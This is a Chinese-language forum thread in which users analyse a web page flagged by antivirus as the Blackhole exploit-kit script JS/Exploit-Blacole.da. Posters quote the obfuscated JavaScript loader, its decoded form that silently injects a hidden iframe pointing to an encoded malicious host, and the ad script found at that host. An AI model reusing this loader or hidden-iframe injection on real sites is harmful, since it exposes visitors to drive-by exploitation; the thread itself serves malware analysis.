http://ficus.pntic.mec.es/rmag0063

墨家小子

2013/4/25        12:09:18        已删除 (清理失败，因为该检测项不可清理)         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5AZN4WY\rmag0063[1].htm\00000585.js        JS/Exploit-Blacole.da (特洛伊)

dayangyang

1. script>b=new function(){return 2;};if(!+b)String.prototype.vqwfbeweb='h'+'arC';for(i in $='b4h3tbn34')if(i=='vqwfbeweb')m=$[i];try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'v'+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd='e';if({}.asd==='e')a=document["c"+"r"+"e"+"a"+"t"+"e"+"T"+"e"+"x"+"t"+"N"+"o"+"d"+"e"]('321');if(a.data==321)h=-1*(d-d2);n=[-h+7,-h+7,-h+103,-h+100,-h+30,-h+38,-h+98,-h+109,-h+97,-h+115,-h+107,-h+99,-h+108,-h+114,-h+44,-h+101,-h+99,-h+114,-h+67,-h+106,-h+99,-h+107,-h+99,-h+108,-h+114,-h+113,-h+64,-h+119,-h+82,-h+95,-h+101,-h+76,-h+95,-h+107,-h+99,-h+38,-h+37,-h+96,-h+109,-h+98,-h+119,-h+37,-h+39,-h+89,-h+46,-h+91,-h+39,-h+121,-h+7,-h+7,-h+7,-h+103,-h+100,-h+112,-h+95,-h+107,-h+99,-h+112,-h+38,-h+39,-h+57,-h+7,-h+7,-h+123,-h+30,-h+99,-h+106,-h+113,-h+99,-h+30,-h+121,-h+7,-h+7,-h+7,-h+98,-h+109,-h+97,-h+115,-h+107,-h+99,-h+108,-h+114,-h+44,-h+117,-h+112,-h+103,-h+114,-h+99,-h+38,-h+32,-h+58,-h+103,-h+100,-h+112,-h+95,-h+107,-h+99,-h+30,-h+113,-h+112,-h+97,-h+59,-h+37,-h+102,-h+114,-h+114,-h+110,-h+56,-h+45,-h+45,-h+35,-h+53,-h+47,-h+35,-h+52,-h+51,-h+35,-h+53,-h+48,-h+35,-h+52,-h+52,-h+35,-h+52,-h+54,-h+35,-h+52,-h+53,-h+35,-h+52,-h+64,-h+35,-h+52,-h+47,-h+35,-h+52,-h+50,-h+35,-h+52,-h+54,-h+35,-h+53,-h+49,-h+35,-h+52,-h+52,-h+35,-h+53,-h+51,-h+35,-h+52,-h+64,-h+35,-h+52,-h+54,-h+35,-h+52,-h+51,-h+35,-h+53,-h+48,-h+35,-h+53,-h+50,-h+35,-h+52,-h+53,-h+35,-h+53,-h+48,-h+35,-h+53,-h+46,-h+35,-h+52,-h+68,-h+35,-h+53,-h+50,-h+35,-h+52,-h+53,-h+35,-h+52,-h+63,-h+35,-h+53,-h+46,-h+35,-h+52,-h+68,-h+35,-h+52,-h+55,-h+35,-h+52,-h+50,-h+35,-h+52,-h+52,-h+35,-h+52,-h+53,-h+35,-h+48,-h+67,-h+35,-h+52,-h+49,-h+35,-h+52,-h+51,-h+35,-h+48,-h+67,-h+35,-h+52,-h+66,-h+35,-h+53,-h+49,-h+45,-h+107,-h+95,-h+103,-h+108,-h+44,-h+110,-h+102,-h+110,-h+61,-h+110,-h+95,-h+101,-h+99,-h+59,-h+96,-h+51,-h+95,-h+54,-h+53,-h+97,-h+49,-h+50,-h+48,-h+49,-h+46,-h+96,-h+99,-h+53,-h+53,-h+51,-h+37,-h+30,-h+117,-h+103,-h+98,-h+114,-h+102,-h+59,-h+37,-h+47,-h+46,-h+37,-h+30,-h+102,-h+99,-h+103,-h+101,-h+102,-h+114,-h+59,-h+37,-h+47,-h+46,-h+37,-h+30,-h+113,-h+114,-h+119,-h+106,-h+99,-h+59,-h+37,-h+116,-h+103,-h+113,-h+103,-h+96,-h+103,-h+106,-h+103,-h+114,-h+119,-h+56,-h+102,-h+103,-h+98,-h+98,-h+99,-h+108,-h+57,-h+110,-h+109,-h+113,-h+103,-h+114,-h+103,-h+109,-h+108,-h+56,-h+95,-h+96,-h+113,-h+109,-h+106,-h+115,-h+114,-h+99,-h+57,-h+106,-h+99,-h+100,-h+114,-h+56,-h+46,-h+57,-h+114,-h+109,-h+110,-h+56,-h+46,-h+57,-h+37,-h+60,-h+58,-h+45,-h+103,-h+100,-h+112,-h+95,-h+107,-h+99,-h+60,-h+32,-h+39,-h+57,-h+7,-h+7,-h+123,-h+7,-h+7,-h+100,-h+115,-h+108,-h+97,-h+114,-h+103,-h+109,-h+108,-h+30,-h+103,-h+100,-h+112,-h+95,-h+107,-h+99,-h+112,-h+38,-h+39,-h+121,-h+7,-h+7,-h+7,-h+116,-h+95,-h+112,-h+30,-h+100,-h+30,-h+59,-h+30,-h+98,-h+109,-h+97,-h+115,-h+107,-h+99,-h+108,-h+114,-h+44,-h+97,-h+112,-h+99,-h+95,-h+114,-h+99,-h+67,-h+106,-h+99,-h+107,-h+99,-h+108,-h+114,-h+38,-h+37,-h+103,-h+100,-h+112,-h+95,-h+107,-h+99,-h+37,-h+39,-h+57,-h+100,-h+44,-h+113,-h+99,-h+114,-h+63,-h+114,-h+114,-h+112,-h+103,-h+96,-h+115,-h+114,-h+99,-h+38,-h+37,-h+113,-h+112,-h+97,-h+37,-h+42,-h+37,-h+102,-h+114,-h+114,-h+110,-h+56,-h+45,-h+45,-h+35,-h+53,-h+47,-h+35,-h+52,-h+51,-h+35,-h+53,-h+48,-h+35,-h+52,-h+52,-h+35,-h+52,-h+54,-h+35,-h+52,-h+53,-h+35,-h+52,-h+64,-h+35,-h+52,-h+47,-h+35,-h+52,-h+50,-h+35,-h+52,-h+54,-h+35,-h+53,-h+49,-h+35,-h+52,-h+52,-h+35,-h+53,-h+51,-h+35,-h+52,-h+64,-h+35,-h+52,-h+54,-h+35,-h+52,-h+51,-h+35,-h+53,-h+48,-h+35,-h+53,-h+50,-h+35,-h+52,-h+53,-h+35,-h+53,-h+48,-h+35,-h+53,-h+46,-h+35,-h+52,-h+68,-h+35,-h+53,-h+50,-h+35,-h+52,-h+53,-h+35,-h+52,-h+63,-h+35,-h+53,-h+46,-h+35,-h+52,-h+68,-h+35,-h+52,-h+55,-h+35,-h+52,-h+50,-h+35,-h+52,-h+52,-h+35,-h+52,-h+53,-h+35,-h+48,-h+67,-h+35,-h+52,-h+49,-h+35,-h+52,-h+51,-h+35,-h+48,-h+67,-h+35,-h+52,-h+66,-h+35,-h+53,-h+49,-h+45,-h+107,-h+95,-h+103,-h+108,-h+44,-h+110,-h+102,-h+110,-h+61,-h+110,-h+95,-h+101,-h+99,-h+59,-h+96,-h+51,-h+95,-h+54,-h+53,-h+97,-h+49,-h+50,-h+48,-h+49,-h+46,-h+96,-h+99,-h+53,-h+53,-h+51,-h+37,-h+39,-h+57,-h+100,-h+44,-h+113,-h+114,-h+119,-h+106,-h+99,-h+44,-h+116,-h+103,-h+113,-h+103,-h+96,-h+103,-h+106,-h+103,-h+114,-h+119,-h+59,-h+37,-h+102,-h+103,-h+98,-h+98,-h+99,-h+108,-h+37,-h+57,-h+100,-h+44,-h+113,-h+114,-h+119,-h+106,-h+99,-h+44,-h+110,-h+109,-h+113,-h+103,-h+114,-h+103,-h+109,-h+108,-h+59,-h+37,-h+95,-h+96,-h+113,-h+109,-h+106,-h+115,-h+114,-h+99,-h+37,-h+57,-h+100,-h+44,-h+113,-h+114,-h+119,-h+106,-h+99,-h+44,-h+106,-h+99,-h+100,-h+114,-h+59,-h+37,-h+46,-h+37,-h+57,-h+100,-h+44,-h+113,-h+114,-h+119,-h+106,-h+99,-h+44,-h+114,-h+109,-h+110,-h+59,-h+37,-h+46,-h+37,-h+57,-h+100,-h+44,-h+113,-h+99,-h+114,-h+63,-h+114,-h+114,-h+112,-h+103,-h+96,-h+115,-h+114,-h+99,-h+38,-h+37,-h+117,-h+103,-h+98,-h+114,-h+102,-h+37,-h+42,-h+37,-h+47,-h+46,-h+37,-h+39,-h+57,-h+100,-h+44,-h+113,-h+99,-h+114,-h+63,-h+114,-h+114,-h+112,-h+103,-h+96,-h+115,-h+114,-h+99,-h+38,-h+37,-h+102,-h+99,-h+103,-h+101,-h+102,-h+114,-h+37,-h+42,-h+37,-h+47,-h+46,-h+37,-h+39,-h+57,-h+7,-h+7,-h+7,-h+98,-h+109,-h+97,-h+115,-h+107,-h+99,-h+108,-h+114,-h+44,-h+101,-h+99,-h+114,-h+67,-h+106,-h+99,-h+107,-h+99,-h+108,-h+114,-h+113,-h+64,-h+119,-h+82,-h+95,-h+101,-h+76,-h+95,-h+107,-h+99,-h+38,-h+37,-h+96,-h+109,-h+98,-h+119,-h+37,-h+39,-h+89,-h+46,-h+91,-h+44,-h+95,-h+110,-h+110,-h+99,-h+108,-h+98,-h+65,-h+102,-h+103,-h+106,-h+98,-h+38,-h+100,-h+39,-h+57,-h+7,-h+7,-h+123];for(i=0;i<n.length;i++)ss+=s(eval("n"+"[i"+"]"));if(!+b)eval(ss);</script>

复制代码

dayangyang

1. if (document.getElementsByTagName('body')[0]){iframer();}
   
2. else {
   
3.               document.write("<iframe src='http://%71%65%72%66%68%67%6B%61%64%68%73%66%75%6B%68%65%72%74%67%72%70%6F%74%67%6A%70%6F%69%64%66%67%2E%63%65%2E%6D%73/main.php?page=b5a87c34230be775' width='10' height='10' style='visibility:hidden;
   
4.     position:absolute;
   
5.     left:0;
   
6.     top:0;
   
7.     '></iframe>");
   
8.     }
   
9. function iframer(){
   
10.               var f = document.createElement('iframe');
    
11.     f.setAttribute('src','http://%71%65%72%66%68%67%6B%61%64%68%73%66%75%6B%68%65%72%74%67%72%70%6F%74%67%6A%70%6F%69%64%66%67%2E%63%65%2E%6D%73/main.php?page=b5a87c34230be775');
    
12.     f.style.visibility='hidden';
    
13.     f.style.position='absolute';
    
14.     f.style.left='0';
    
15.     f.style.top='0';
    
16.     f.setAttribute('width','10');
    
17.     f.setAttribute('height','10');
    
18.    document.getElementsByTagName('body')[0].appendChild(f);
    
19. }
    
20.       

复制代码

其中网址打开

1. <script type="text/javascript" language="JavaScript">if(top.location!=location)top.location.href=document.location.href;
   
2.     /* 1ac30845f3f5d5c5c5b94a3cf69899c3 */var phrase_related="Related Searches";
   
3.     var phrase_listings="Ads";
   
4.     var domain="ce.ms";
   
5.     var clientIDs="ca-dp-teaminternet01_3ph";
   
6.     var adtest="off";
   
7.     var x2c=false;
   
8.     var clientIDd="ca-dp-teaminternet01_3ph";
   
9.     var clientIDr="ca-dp-teaminternet-rs";
   
10.     var scriptPath="";
    
11.     var numRadLinks=35;
    
12.     var xlang="zh_CN";
    
13.     var clientChannel="000756,bucket062,bucket046";
    
14.     var bucket="bucket062,bucket046";
    
15.     var themedata="fENsZWFuQmxhY2t8fGY3YjAyfHxidWNrZXQwNjJ8YnVja2V0MDQ2fHwwfHw1MTc5MzQyYTliYTZjfHx8MTM2Njg5NzcwNy4yMzU2fDVjZGZiZTIxZjk3Y2I2YzQ5OTk4ODZmNmIwOGNiNTU4ZGFkMzExMjJ8fHx8fHw=";
    
16.     var isAdult=false;
    
17.     var keyword="buy premarin 1.25 mg";
    
18.     var relSplits = Array();
    
19.      relSplits[0] = 10;
    
20.      relSplits[1] = 5;
    
21.      relSplits[2] = 20;
    
22.     var uniqueTrackingID="MTM2Njg5NzcwNy4yMzU6ZmJiYzJmMzBkMmY4NTdkNThhMGJlZTIwM2MxYjU3YWRkYTc4YTE4OA==";
    
23.     var is_UserSearch=false;
    
24.     var afs_q="";
    
25.     var num_ads=10;
    
26.     var rxid="0";
    
27.     var xt_auto_load = "0";
    
28.     var xsearch='';
    
29.     var xkw='';
    
30.     var xpcat='';
    
31.     var country="cn";
    
32.     var asset_path="http://go.cdnpk.com";
    
33.     var script_path="";
    
34.     var ownterms=false;
    
35.     var xwr=false;
    
36.     </script>

复制代码